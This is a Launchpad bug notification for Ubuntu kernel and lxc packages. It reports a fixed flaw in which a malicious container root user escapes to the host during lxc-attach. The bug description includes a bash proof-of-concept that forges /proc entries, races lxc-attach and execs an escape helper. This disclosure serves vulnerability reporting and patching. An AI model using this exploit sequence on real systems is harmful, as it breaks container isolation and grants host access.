This bug was fixed in the package linux - 3.19.0-75.83 --------------- linux (3.19.0-75.83) vivid; urgency=low
[ Luis Henriques ] * Release Tracking Bug - LP: #1640613 * lxc-attach to malicious container allows access to host (LP: #1639345) - Revert "UBUNTU: ptrace: being capable wrt a process requires mapped uids/gids" - (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission checks * CVE-2016-8658 - brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap() * CVE-2016-7425 - scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() -- Luis Henriques <luis.henriq...@canonical.com> Wed, 09 Nov 2016 22:48:56 +0000 ** Changed in: linux (Ubuntu Vivid) Status: Fix Committed => Fix Released ** Changed in: linux (Ubuntu Xenial) Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Kernel Packages, which is subscribed to linux in Ubuntu. https://bugs.launchpad.net/bugs/1639345 Title: lxc-attach to malicious container allows access to host Status in linux package in Ubuntu: Triaged Status in lxc package in Ubuntu: Fix Released Status in linux source package in Trusty: Fix Released Status in lxc source package in Trusty: Fix Released Status in linux source package in Vivid: Fix Released Status in lxc source package in Vivid: Fix Released Status in linux source package in Xenial: Fix Released Status in lxc source package in Xenial: Fix Released Status in linux source package in Yakkety: Fix Released Status in lxc source package in Yakkety: Fix Released Bug description: A malicious root user in an unprivileged container may interfere with lxc-attach to provide manipulated guest proc file system information to disable dropping of capabilities and may in the end access the host file system by winning a very easy race against lxc-attach. In guest sequence: cat <<EOF > /tmp/test #!/bin/bash -e rm -rf /test || true mkdir -p /test/sys/kernel echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts echo 0 > /test/sys/kernel/cap_last_cap mkdir -p /test/self mknod /test/self/status p cd /proc mount -o bind /test /proc while true; do pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe ->.*/\\1/') if [ "\${pid}" != "" ]; then cd / umount -i -f -l -n /proc exec /LxcAttachEscape "\${pid}" /bin/bash fi sleep 1 done EOF See attachment for LxcAttachEscape.c Exploit uses fixed fd=7 for attacking, on other test environment, it might be other fd. Tests were performed by attacking lxc-attach started by screen lxc-attach -n [guestname] which is the sequence required against the TTY-stealing attacks also not fixed in all lxc-attach versions. In my opinion two bugs might need fixing: * lxc-attach should not use untrusted/manipulated information for proceeding * kernel should prevent against ptracing of lxc-attach as it was created in another USERNS # lsb_release -r -d Description: Ubuntu 16.04.1 LTS Release: 16.04 # apt-cache policy lxc1 lxc1: Installed: 2.0.5-0ubuntu1~ubuntu16.04.2 Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2 Version table: *** 2.0.5-0ubuntu1~ubuntu16.04.2 500 500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.0.0-0ubuntu2 500 500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64 Packages To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions -- Mailing list: https://launchpad.net/~kernel-packages Post to : kernel-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~kernel-packages More help : https://help.launchpad.net/ListHelp